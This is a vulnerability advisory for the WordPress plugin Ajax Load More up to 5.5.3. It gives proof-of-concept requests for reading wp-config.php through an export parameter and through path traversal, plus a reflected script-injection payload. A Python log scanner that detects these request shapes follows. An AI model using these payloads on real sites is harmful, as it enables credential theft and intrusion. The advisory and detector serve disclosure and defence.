Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Authenticated Information Disclosure / Local File Disclosure:

The "ajax-load-more-repeaters" admin page accepts an arbitrary filesystem path in the POST parameter "alm_repeaters_export" and returns the contents of that file, so an authenticated user who can reach the page can read files on the web server (local file disclosure). Because the request carries the absolute server-side path, the same behaviour also amounts to a full path disclosure. PoC for reading the WordPress configuration file:

POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php

Vulnerable file: admin/admin.php

Authenticated Cross-Site Scripting:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}

The "index" parameter is not properly sanitized before it is reflected in the response. Vulnerable file: admin/admin.php

Authenticated Path traversal to arbitrary file read:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}

The "type" parameter is used to build the template file path without stripping "../" sequences, so the lookup can be pointed at any readable file on the server.

Vulnerable file: admin/admin.php
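As an added example (not part of the original advisory or the plugin's code), the script below flags all three request shapes from this advisory in Combined Log Format access logs: the traversal in the "type" parameter of alm_get_layout, the markup injection in the "index" parameter of alm_get_tax_terms, and POSTs to the repeaters page carrying "alm_repeaters_export". The log lines are constructed, the nonce values are placeholders, and the thresholds (any ".." or absolute path in "type", any markup character in a non-numeric "index", any path separator in the export parameter) are this example's own choices. Access logs do not record POST bodies, so the export vector can only be confirmed where request-body logging exists; classify_request takes an optional body for that case and otherwise marks the request for manual review.

```python
"""Flag Ajax Load More (<= 5.5.3) abuse patterns in web-server access logs.

Added example, not code from the advisory or the plugin. The request shapes
mirror the PoCs in the advisory; the log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Combined Log Format (nonce values are placeholders).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E&nonce=abcd1234 HTTP/1.1" 200 98 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce=abcd1234 HTTP/1.1" 200 3122 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=default&alias=&nonce=abcd1234 HTTP/1.1" 200 411 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def _first(params, key):
    """First value of a query/body parameter, or '' when absent."""
    return params.get(key, [''])[0]


def classify_request(method, target, body=None):
    """Return the advisory issues a single request matches (possibly empty)."""
    findings = []
    parts = urlsplit(target)
    q = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    action = _first(q, 'action')

    if parts.path.endswith('/wp-admin/admin-ajax.php'):
        if action == 'alm_get_layout':
            type_param = _first(q, 'type')
            # A repeater template name must never climb directories or be absolute.
            if '..' in type_param or type_param.startswith(('/', '\\')):
                findings.append('alm_get_layout: path traversal in "type"')
        elif action == 'alm_get_tax_terms':
            index = _first(q, 'index')
            # "index" is expected to be numeric; markup characters mean injection.
            if not index.isdigit() and re.search(r'[<>"\']', index):
                findings.append('alm_get_tax_terms: reflected XSS in "index"')
    elif (parts.path.endswith('/wp-admin/admin.php')
          and _first(q, 'page') == 'ajax-load-more-repeaters'
          and method == 'POST'):
        if body is None:
            # Access logs carry no request body; needs WAF/app-level body logging.
            findings.append('repeaters export POST: body not logged, review manually')
        else:
            export = _first(parse_qs(body, keep_blank_values=True),
                            'alm_repeaters_export')
            if '/' in export or '\\' in export or '..' in export:
                findings.append('alm_repeaters_export: arbitrary file path')
    return findings


def scan_log(text):
    """Parse log lines and return (ip, method, target, findings) for each hit."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        found = classify_request(m['method'], m['target'])
        if found:
            hits.append((m['ip'], m['method'], m['target'], found))
    return hits


if __name__ == '__main__':
    for ip, method, target, found in scan_log(SAMPLE_LOG):
        print(ip, method, target, '->', '; '.join(found))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; hits on alm_get_layout with a traversal in "type" from a 200 response are the ones to treat as confirmed reads, since the nonce requirement means the requester already held a valid session.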
